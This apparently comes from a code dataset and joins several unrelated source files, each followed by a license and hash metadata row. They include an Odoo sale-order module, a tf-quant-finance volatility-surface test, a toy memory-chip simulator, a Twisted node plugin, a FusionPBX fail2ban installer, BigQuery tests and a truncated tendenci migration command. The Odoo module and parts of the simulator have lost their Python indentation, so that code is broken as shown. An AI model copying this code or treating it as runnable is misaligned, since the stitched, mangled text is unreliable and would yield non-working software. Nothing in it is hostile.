'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
    def create(self, cr, uid, vals, context = None):
        if not context:
            context = {}
        print "sale", uid, context.get("uid")
        print "Sale Context", context
        print "Create Website Sale Order......", vals
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
uid = context.get("uid",uid)
team_id = vals.get('team_id',False)
if team_id !=3:
if vals.get('warehouse_id',False):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id'))
#to select sub company shop
if not warehouse.company_id.parent_id:
                    raise osv.except_osv(_('User Error'), _('You must select a sub-company sale warehouse!'))
partner_id = vals.get('partner_id',False)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).create(cr, uid, vals, context = context)
def write(self, cr, uid, ids, vals, context = None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
if isinstance(ids, (int, long)):
ids = [ids]
if not ids:
return []
case = self.browse(cr, uid, ids[0])
if uid != 1:
if vals.get('warehouse_id',case.warehouse_id.id):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id',case.warehouse_id.id))
if not warehouse.company_id.parent_id:
                    raise osv.except_osv(_('User Error'), _('You must select a sub-company sale warehouse!'))
if vals.get('partner_id', case.partner_id):
partner_id = vals.get('partner_id', case.partner_id.id)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).write(cr, uid, ids, vals, context = context)
#inherited
def action_button_confirm(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
for ln in case.order_line:
for t in ln.tax_id:
if t.company_id.id != case.company_id.id :
                    raise osv.except_osv(_('Configuration Error!'),_('Please define taxes related to the company \n "%s" !')%(case.company_id.name))
return super(sale_order,self).action_button_confirm(cr, uid, ids, context)
# Inheriting action_ship_create Method to update Sale ID in Delivery Order
def action_ship_create(self, cr, uid, ids, context=None):
if not context:
context={}
pick_ids=[]
# context.get('active_ids').sort()
res=super(sale_order, self).action_ship_create(cr, uid, ids,context)
pick=self.pool.get('stock.picking')
for case in self.browse(cr,uid,ids):
pick_ids=pick.search(cr,uid,[('group_id','=',case.procurement_group_id.id)])
pick.write(cr,uid,pick_ids,{
'sale_id' : case.id,
'company_id' : case.company_id.id,
})
return res
#
# def web_comp_tax(self,cr, uid, ids, warehouse_id, company_id, context=None):
# context = dict(context or {})
# print "Wrehouse Sale.........",warehouse_id
# if warehouse_id:
# self.write(cr, uid, ids, {"warehouse_id":warehouse_id,
# 'company_id':company_id,
# })
# return True
sale_order()
class sale_order_line(osv.osv):
_name = 'sale.order.line'
_inherit = 'sale.order.line'
_description = 'Sales Order Line'
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
def _get_price_reduce(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0.0)
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.price_subtotal / line.product_uom_qty
return res
def _amount_line(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
if context is None:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = {'price_total':0.0,'price_subtotal':0.0}
price = line.price_unit #* (1 - (line.discount or 0.0) / 100.0)
taxes = tax_obj.compute_all(cr, uid, line.tax_id, price, line.product_uom_qty, line.product_id, line.order_id.partner_id)
# print "Taxes......", taxes
cur = line.order_id.pricelist_id.currency_id
res[line.id]['price_subtotal'] = cur_obj.round(cr, uid, cur, taxes['total'])
# for price total
amount = taxes['total']
for t in taxes.get('taxes',False):
amount += t['amount']
res[line.id]['price_total'] = cur_obj.round(cr, uid, cur, amount)
return res
    # Overridden to remove the discount calculation (the discount is already included in the unit price)
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = 0
if line.product_id:
if line.purchase_price:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.purchase_price*line.product_uos_qty), 2)
else:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.product_id.standard_price*line.product_uos_qty), 2)
return res
_columns = {
'price_total' : fields.function(_amount_line, string='Subtotal1', digits_compute= dp.get_precision('Account'), store=True, multi="all"),
'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute= dp.get_precision('Account'), multi="all",store=True),
'reference' : fields.char("Reference(BOP)", size=20),
# 'mrp' : fields.related('product_id','list_price', type="float", string="MRP", store=True),
# 'available_qty' : fields.related('product_id','qty_available', type="float", string="Available Quantity", store=True ),
'product_image' : fields.binary('Image'),
'sale_mrp' : fields.float('MRP', digits=(16,2)),
'available_qty' : fields.integer("Available Quantity"),
        # Overridden to remove the discount calculation (the discount is already included in the unit price)
'margin': fields.function(_product_margin, string='Margin',
store = True),
'price_reduce': fields.function(_get_price_reduce, type='float', string='Price Reduce', digits_compute=dp.get_precision('Product Price')),
}
_order = 'id asc'
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
res = super(sale_order_line,self)._prepare_order_line_invoice_line(cr, uid, line, account_id, context=context)
if res:
res.update({'reference': line.reference})
return res
# Overriden
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
context = context or {}
part_obj = self.pool.get("res.partner")
if context.get("uid"):
if context and uid != context.get("uid",False):
uid = context.get("uid")
user_obj = self.pool.get("res.users")
user = user_obj.browse(cr, uid, [context.get("uid",uid)])
partner = part_obj.browse(cr, uid, [user.partner_id.id])
partner_id = partner.id
lang = lang or context.get('lang', False)
if not partner_id:
raise osv.except_osv(_('No Customer Defined!'), _('Before choosing a product,\n select a customer in the sales form.'))
warning = False
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
context = {'lang': lang, 'partner_id': partner_id}
partner = partner_obj.browse(cr, uid, partner_id)
lang = partner.lang
# lang = context.get("lang",False)
context_partner = {'lang': lang, 'partner_id': partner_id}
if not product:
return {'value': {'th_weight': 0,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
if not date_order:
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
result = {}
warning_msgs = ''
product_obj = product_obj.browse(cr, uid, product, context=context_partner)
uom2 = False
if uom:
uom2 = product_uom_obj.browse(cr, uid, uom)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if uos:
if product_obj.uos_id:
uos2 = product_uom_obj.browse(cr, uid, uos)
if product_obj.uos_id.category_id.id != uos2.category_id.id:
uos = False
else:
uos = False
fpos = False
if not fiscal_position:
fpos = partner.property_account_position or False
else:
fpos = self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position)
if update_tax: #The quantity only have changed
result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)
if not flag:
result['name'] = self.pool.get('product.product').name_get(cr, uid, [product_obj.id], context=context_partner)[0][1]
if product_obj.description_sale:
result['name'] += '\n'+product_obj.description_sale
domain = {}
if (not uom) and (not uos):
result['product_uom'] = product_obj.uom_id.id
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
uos_category_id = product_obj.uos_id.category_id.id
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
uos_category_id = False
result['th_weight'] = qty * product_obj.weight
domain = {'product_uom':
[('category_id', '=', product_obj.uom_id.category_id.id)],
'product_uos':
[('category_id', '=', uos_category_id)]}
elif uos and not uom: # only happens if uom is False
result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id
result['product_uom_qty'] = qty_uos / product_obj.uos_coeff
result['th_weight'] = result['product_uom_qty'] * product_obj.weight
elif uom: # whether uos is set or not
default_uom = product_obj.uom_id and product_obj.uom_id.id
q = product_uom_obj._compute_qty(cr, uid, uom, qty, default_uom)
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
result['th_weight'] = q * product_obj.weight # Round the quantity up
if not uom2:
uom2 = product_obj.uom_id
# get unit price
if not pricelist:
warn_msg = _('You have to select a pricelist or a customer in the sales form !\n'
'Please set one before choosing a product.')
warning_msgs += _("No Pricelist ! : ") + warn_msg +"\n\n"
else:
price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],
product, qty or 1.0, partner_id, {
'uom': uom or result.get('product_uom'),
'date': date_order,
})[pricelist]
if price is False:
warn_msg = _("Cannot find a pricelist line matching this product and quantity.\n"
"You have to change either the product, the quantity or the pricelist.")
warning_msgs += _("No valid pricelist line found ! :") + warn_msg +"\n\n"
else:
result.update({'price_unit': price})
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
return {'value': result, 'domain': domain, 'warning': warning}
#inherited
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, warehouse_id=False, context=None):
if not context:
context= {}
context = dict(context)
case = self.browse(cr, uid, ids)
uom = case.product_uom and case.product_uom.id or False
res = super(sale_order_line,self).product_id_change_with_wh(cr, uid, ids, pricelist, product, qty, uom, qty_uos, uos, name, partner_id, lang, update_tax, date_order, packaging, fiscal_position, flag, warehouse_id,context)
#if the product changes and product not in price_list then it will take the sale price
location_ids =[]
unit_amt = 0.00
move_obj = self.pool.get("stock.move")
loc_obj = self.pool.get("stock.location")
prod_obj =self.pool.get("product.product")
prod = prod_obj.browse(cr, uid,product)
pricelist_obj = self.pool.get("product.pricelist")
warehouse_obj = self.pool.get("stock.warehouse")
pricelist_id = pricelist_obj.browse(cr, uid, pricelist)
if warehouse_id: # shop is nothing but company_id
context.update({'warehouse':warehouse_id})
warehouse = warehouse_obj.browse(cr, uid, warehouse_id)
res['value']['company_id'] = warehouse.company_id.id
# warehouse_id = context.get('warehouse_id')
# warehouse = self.pool.get("stock.warehouse").browse(cr, uid, warehouse_id)
# comp_id = warehouse.company_id.id
# location_ids = loc_obj.search(cr, uid,[('company_id','=',comp_id ),('name','=','Stock')])
# if location_ids:
# location_ids = location_ids[0]
if product:
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
# Commented for Pricelist Concept
if pricelist_id.name == 'Public Pricelist' or not res['value'].get('price_unit'):
unit_amt = prod.discount and prod.list_price - ((prod.discount/100) * prod.list_price) or prod.list_price
res['value']['discount'] = prod.discount
if not res['value'].get('price_unit') and product:
res['value']['price_unit'] = unit_amt and unit_amt or prod.list_price
warn_msg = _('No Product in The Current Pricelist, It Will Pick The Sales Price')
warning_msgs = _("No Pricelist ! : ") + warn_msg +"\n\n"\
res['warning'] = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
if product:
res['value']['sale_mrp'] = prod.list_price
res['value']['product_image'] = prod.image_medium
res['value']['available_qty'] = available_qty
res['value']['purchase_price'] = prod.standard_price or 0.00
# Commented for Pricelist Concept
if unit_amt :
res['value']['price_unit'] = unit_amt
return res
def create(self, cr, uid, vals, context=None):
if not context:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
context = dict(context)
uom_obj = self.pool.get("product.uom")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
sale_obj = self.pool.get("sale.order")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
order_id = vals.get('order_id')
case = sale_obj.browse(cr, uid,order_id )
company_id = case.warehouse_id.company_id.id
res = self.product_id_change_with_wh(cr, uid, [], case.pricelist_id.id,vals.get('product_id',False),vals.get('qty',0), vals.get('uom',False), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.warehouse_id.id,context=context)['value']
prod_uom = case.product_id.uom_id.id
line_uom = vals.get('product_uom')
# For Case of UOM
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, vals.get('product_uom'))
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor)
})
if case.warehouse_id: # shop is nothing but company_id
context.update({'warehouse':case.warehouse_id.id})
# Commented for Pricelist Concept
if res.get('discount'):
vals.update({
'discount' : res.get('discount') and res.get('discount') or 0.00,
})
if res.get('price_unit') and prod_uom == line_uom:
vals.update({
'price_unit' : res.get('price_unit') and res.get('price_unit') or 0.00,
})
if res.get("price_unit") and prod_uom == line_uom:
vals.update({'price_unit':res.get("price_unit")})
if not vals.get('price_unit')or not res.get('price_unit'):
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (vals['name'],))
location_ids = loc_obj.search(cr, uid,[('company_id','=', company_id),('name','=','Stock')])
comp_id = vals.get("company_id",case.company_id)
if res.get("tax_id"):
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id.id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
if location_ids:
location_ids = location_ids[0]
product = vals.get('product_id', False)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid, vals.get("product_id",False))
vals.update({'available_qty' : available_qty and available_qty or 0,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price})
return super(sale_order_line, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if not context:
context = {}
if context and uid != context.get("uid",False):
uid = context.get("uid")
if not uid:
uid = SUPERUSER_ID
context = dict(context)
prodtemp_obj = self.pool.get("product.template")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
user_obj = self.pool.get("res.users")
uom_obj = self.pool.get("product.uom")
for case in self.browse(cr, uid, ids):
price_unit = vals.get('price_unit')
prod_id = vals.get("product_id", case.product_id.id)
            prod = prod_obj.browse(cr, uid, prod_id)
# prodtemp_id = prod_obj.browse(cr, uid,[prod.product_tmpl_id.id] )
pricelist_id = case.order_id.pricelist_id.id
context.update({'quantity':case.product_uom_qty or 1.0 })
context.update({'pricelist': pricelist_id or False})
context.update({'partner': case.order_id.partner_id.id or False})
# Calling This method update price_unit as Pricelist Price or Price After Discount or Sales Price
prodtemp = prodtemp_obj._product_template_price(cr, uid, [prod.product_tmpl_id.id], 'price', False, context=context)
price_unit = prodtemp[prod.product_tmpl_id.id]
if price_unit <=0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if not price_unit:
price_unit = case.price_unit
if price_unit <= 0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if price_unit:
vals.update({
'price_unit':price_unit
})
if vals.get('warehouse_id',case.order_id.warehouse_id.id): # shop is nothing but company_id
context.update({'warehouse':vals.get('warehouse_id',case.order_id.warehouse_id.id)})
product = vals.get('product_id', case.product_id.id)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
            prod = prod_obj.browse(cr, uid, product)
vals.update({
'available_qty' : available_qty,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price
})
res = self.product_id_change_with_wh(cr, uid, [], case.order_id.pricelist_id.id,vals.get('product_id',case.product_id.id),vals.get('qty',0), vals.get('uom',case.product_uom.id), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.order_id.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.order_id.warehouse_id.id,context=context)['value']
# For Case of UOM
prod_uom = prod.uom_id.id
line_uom = vals.get('product_uom',case.product_uom.id)
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, line_uom)
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor),
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
})
if prod_uom == line_uom:
vals.update({
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
'price_unit': res.get("price_unit") and res.get("price_unit") or 1
})
if res.get("tax_id"):
comp_id = vals.get("company_id",case.company_id.id)
if res.get("company_id"):
comp_id = res.get("company_id", case.company_id)
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
return super(sale_order_line, self).write(cr, uid, [case.id], vals, context=context)
sale_order_line()
| agpl-3.0 | -6,004,310,348,129,873,000 | 47.130389 | 337 | 0.514135 | false |
google/tf-quant-finance | tf_quant_finance/experimental/pricing_platform/framework/market_data/volatility_surface_test.py | 1 | 4582 | # Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for rate_curve.py."""
from absl.testing import parameterized
import tensorflow.compat.v2 as tf
import tf_quant_finance as tff
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
volatility_surface = tff.experimental.pricing_platform.framework.market_data.volatility_surface
dateslib = tff.datetime
core = tff.experimental.pricing_platform.framework.core
InterpolationMethod = core.interpolation_method.InterpolationMethod
# This function can't be moved to SetUp since that would break graph mode
# execution
def build_surface(dim, default_interp=True):
dtype = tf.float64
year = dim * [[2021, 2022, 2023, 2025, 2050]]
month = dim * [[2, 2, 2, 2, 2]]
day = dim * [[8, 8, 8, 8, 8]]
expiries = tff.datetime.dates_from_year_month_day(year, month, day)
valuation_date = [(2020, 6, 24)]
strikes = dim * [[[1500, 1550, 1510],
[1500, 1550, 1510],
[1500, 1550, 1510],
[1500, 1550, 1510],
[1500, 1550, 1510]]]
volatilities = dim * [[[0.1, 0.12, 0.13],
[0.15, 0.2, 0.15],
[0.1, 0.2, 0.1],
[0.1, 0.2, 0.1],
[0.1, 0.1, 0.3]]]
interpolator = None
if not default_interp:
expiry_times = tf.cast(
tff.datetime.convert_to_date_tensor(
valuation_date).days_until(expiries), dtype=dtype) / 365.0
interpolator_obj = tff.math.interpolation.interpolation_2d.Interpolation2D(
expiry_times, tf.convert_to_tensor(strikes, dtype=dtype),
volatilities)
interpolator = interpolator_obj.interpolate
return volatility_surface.VolatilitySurface(
valuation_date, expiries, strikes, volatilities,
interpolator=interpolator, dtype=dtype)
@test_util.run_all_in_graph_and_eager_modes
class VolatilitySurfaceTest(tf.test.TestCase, parameterized.TestCase):
def test_volatility_1d(self):
vol_surface = build_surface(1)
expiry = tff.datetime.dates_from_tuples(
[(2020, 6, 16), (2021, 6, 1), (2025, 1, 1)])
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570]], expiry_dates=expiry.expand_dims(axis=0))
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1]], atol=1e-6)
def test_volatility_2d(self):
vol_surface = build_surface(2)
expiry = tff.datetime.dates_from_ordinals(
[[737592, 737942, 739252],
[737592, 737942, 739252]])
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570], [1525, 1505, 1570]], expiry_dates=expiry)
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1],
[0.14046875, 0.12300392, 0.1]], atol=1e-6)
def test_volatility_2d_interpolation(self):
"""Test using externally specified interpolator."""
vol_surface = build_surface(2, False)
expiry = tff.datetime.dates_from_ordinals(
[[737592, 737942, 739252],
[737592, 737942, 739252]])
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570], [1525, 1505, 1570]], expiry_dates=expiry)
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1],
[0.14046875, 0.12300392, 0.1]], atol=1e-6)
def test_volatility_2d_floats(self):
vol_surface = build_surface(2)
expiry = tff.datetime.dates_from_ordinals(
[[737592, 737942, 739252],
[737592, 737942, 739252]])
valuation_date = tff.datetime.convert_to_date_tensor([(2020, 6, 24)])
expiries = tf.cast(valuation_date.days_until(expiry),
dtype=vol_surface._dtype) / 365.0
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570], [1525, 1505, 1570]],
expiry_times=expiries)
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1],
[0.14046875, 0.12300392, 0.1]], atol=1e-6)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | -7,667,539,642,388,929,000 | 37.830508 | 95 | 0.640986 | false |
BenProjex/ArchProject | chip/Memory.py | 1 | 2024 |
#!/usr/bin/python
WRITE = 1
READ = 0
###########################################################
#Note: class Chip is only used internally by class Memory#
###########################################################
class Chip:
def __init__(self,name):
self.data = [0]*(2**12)
    self.name = name
#rdOrwr: 0 for read and 1 for write
def read8bit(self,address,data):
print("read data at chip: ",self.name," address [$", address,"] = $", self.data[address],".");
return self.data[address]
def write8bit(self,address,data):
print("Write $",data," to chip: ",self.name," address [$", address,"].");
self.data[address] = data
###############################################################
#The Memory class works like a real memory module: it stores  #
#the instruction pointer and data.                             #
#Call the memoryOp method to read data from or write data to memory.
#
#example:
#m = Memory()
#m.memoryOp(4096,34,1) #memoryOp(address,data,rdOrwr)
#rdOrwr(1 bit) = 1 means write to memory:
#this call writes data(8bit) = 34 to address(16bit) = 4096
#
#m.memoryOp(4096,34,0) #memoryOp(address,data,rdOrwr)
#rdOrwr(1 bit) = 0 means read from memory
#(note: the data parameter is ignored for reads);
#this call reads from memory address(16bit) = 4096 and returns #
#the data(8bit)                                                #
################################################################
class Memory:
def __init__(self):
    self.chip = [Chip("U" + str(200+i)) for i in range(16)]  # 16 chips x 4 KiB cover the full 64 KiB address space
def memoryOp(self,address,data,rdOrwr):
if(address<=65535):
chipselect = address >> 12
chipaddr = address & 4095
if rdOrwr == WRITE:
self.chip[chipselect].write8bit(chipaddr,data)
elif rdOrwr == READ:
return self.chip[chipselect].read8bit(chipaddr,data)
else:
return None
else:
raise Exception('the address is overflow')
#temp = Memory();
#temp.memoryOp(5000,300,WRITE);
#print(temp.memoryOp(5000,300,READ)); | gpl-3.0 | -5,691,190,682,838,375,000 | 34.526316 | 98 | 0.551877 | false |
dr4ke616/pinky | twisted/plugins/node.py | 1 | 1334 | from zope.interface import implements
from twisted.python import usage
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
from pinky.node.service import NodeService
class Options(usage.Options):
optParameters = [
['port', None, None, 'The port number to listen on.'],
['host', None, None, 'The host address to bind to.'],
['broker_host', 'h', None, 'The broker host to connect to.'],
['broker_port', 'p', 43435, 'The broker port to connect to.']
]
optFlags = [
['debug', 'b', 'Enable/disable debug mode.']
]
class NodeServiceMaker(object):
implements(IServiceMaker, IPlugin)
tapname = "node"
description = "Startup an instance of the Pinky node"
options = Options
def makeService(self, options):
""" Construct a Node Server
"""
return NodeService(
port=options['port'],
host=options['host'],
broker_host=options['broker_host'],
broker_port=options['broker_port'],
debug=options['debug']
)
# Now construct an object which *provides* the relevant interfaces
# The name of this variable is irrelevant, as long as there is *some*
# name bound to a provider of IPlugin and IServiceMaker.
serviceMaker = NodeServiceMaker()
| mit | -2,104,320,416,493,700,000 | 28.644444 | 69 | 0.646927 | false |
jordanrinke/fusionpbx-installer | installers/fail2ban.py | 1 | 2492 | import shutil
import subprocess
import sys
import os
"""
FusionPBX
Version: MPL 1.1
The contents of this file are subject to the Mozilla Public License Version
1.1 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.mozilla.org/MPL/
Software distributed under the License is distributed on an "AS IS" basis,
WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
for the specific language governing rights and limitations under the
License.
The Initial Developer of the Original Code is
Jim Millard <[email protected]>
Portions created by the Initial Developer are Copyright (C) 2008-2016
the Initial Developer. All Rights Reserved.
Contributor(s):
Mark J. Crane <[email protected]>
"""
def ifail2ban(fpbxparms):
INSTALL_ROOT = os.getcwd()
if os.path.isfile("%s/resources/install.json" % (INSTALL_ROOT)):
fpbxparms.PARMS = fpbxparms.load_parms(fpbxparms.PARMS)
else:
print("Error no install parameters")
sys.exit(1)
print("Setting up fail2ban to protect your system from some types of attacks")
if os.path.isfile("%s/resources/fail2ban/jail.local" % (INSTALL_ROOT)):
if fpbxparms.whitelist != '':
shutil.copyfile("%s/resources/fail2ban/jail.package" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
else:
shutil.copyfile("%s/resources/fail2ban/jail.source" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
shutil.copyfile("%s/resources/fail2ban/freeswitch-dos.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/freeswitch-dos.conf")
shutil.copyfile("%s/resources/fail2ban/fusionpbx.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/fusionpbx.conf")
if fpbxparms.PARMS["FS_Install_Type"][0] == "P":
ftb = open("/etc/fail2ban/jail.local", 'a')
ftb.write("[DEFAULT]")
ftb.write("\n")
ftb.write("ignoreip = %s" % (fpbxparms.whitelist))
ftb.write("\n")
ftb.close()
ret = subprocess.call("systemctl restart fail2ban",
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
fpbxparms.check_ret(ret, "Restart fail2ban")
return
| mit | 6,252,150,104,698,604,000 | 39.852459 | 99 | 0.620385 | false |
shojikai/python-google-api-clients | test/test_bigquery_select.py | 1 | 2037 | import os
import re
import sys
import unittest
from pprint import pprint
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../')
from google_api_clients.bigquery import BigQuery
class BigQueryTest(unittest.TestCase):
def setUp(self):
self.project_id = os.getenv('PROJECT_ID')
self.dataset_id = os.getenv('DATASET_ID', 'test_dataset')
if self.project_id is None:
print('PROJECT_ID is not defined.')
sys.exit(1)
self.bq = BigQuery(self.project_id)
if self.bq.exists_dataset(self.dataset_id):
self.bq.drop_dataset(self.dataset_id, delete_contents=True)
self.bq.create_dataset(self.dataset_id)
self.bq.dataset_id = self.dataset_id # Set default datasetId
def TearDown(self):
self.bq.drop_dataset(self.dataset_id, delete_contents=True)
def test_normal_page_token(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare] '
res = self.bq.select(query, max_results=1)
self.assertEqual(10, len(res))
pprint(res)
def test_normal_empty(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare] ' \
+ 'WHERE corpus = "hoge" '
res = self.bq.select(query)
self.assertEqual(0, len(res))
pprint(res)
def test_normal_async(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare]'
res = self.bq.select(query, async=True)
self.assertTrue(re.match(r'job_', res))
pprint(res)
def test_normal(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare]'
res = self.bq.select(query)
self.assertEqual(10, len(res))
pprint(res)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -5,119,005,861,355,304,000 | 33.525424 | 78 | 0.609229 | false |
alirizakeles/tendenci | tendenci/apps/invoices/management/commands/update_inv_tb.py | 1 | 4500 | from django.core.management.base import BaseCommand, CommandError
class Command(BaseCommand):
def handle(self, *args, **options):
# command to run: python manage.py update_inv_tb
"""
This command will:
1) add the object_type field
2) populate the object_type field based on the content in invoice_object_type
3) drop field invoice_object_type
4) rename field invoice_object_type_id to object_id
"""
from django.db import connection, transaction
from django.contrib.contenttypes.models import ContentType
cursor = connection.cursor()
# add the object_type field
cursor.execute("ALTER TABLE invoices_invoice ADD object_type_id int AFTER guid")
transaction.commit_unless_managed()
print "Field object_type_id - Added"
# assign content type to object_type based on the invoice_object_type
try:
            ct_make_payment = ContentType.objects.get(app_label='make_payments', model='makepayment')
except:
ct_make_payment = None
try:
            ct_donation = ContentType.objects.get(app_label='donations', model='donation')
except:
ct_donation = None
try:
            ct_job = ContentType.objects.get(app_label='jobs', model='job')
except:
ct_job = None
try:
            ct_directory = ContentType.objects.get(app_label='directories', model='directory')
except:
ct_directory = None
try:
            ct_event_registration = ContentType.objects.get(app_label='events', model='registration')
except:
ct_event_registration = None
try:
            ct_corp_memb = ContentType.objects.get(app_label='corporate_memberships', model='corporatemembership')
except:
ct_corp_memb = None
if ct_make_payment:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='make_payment'
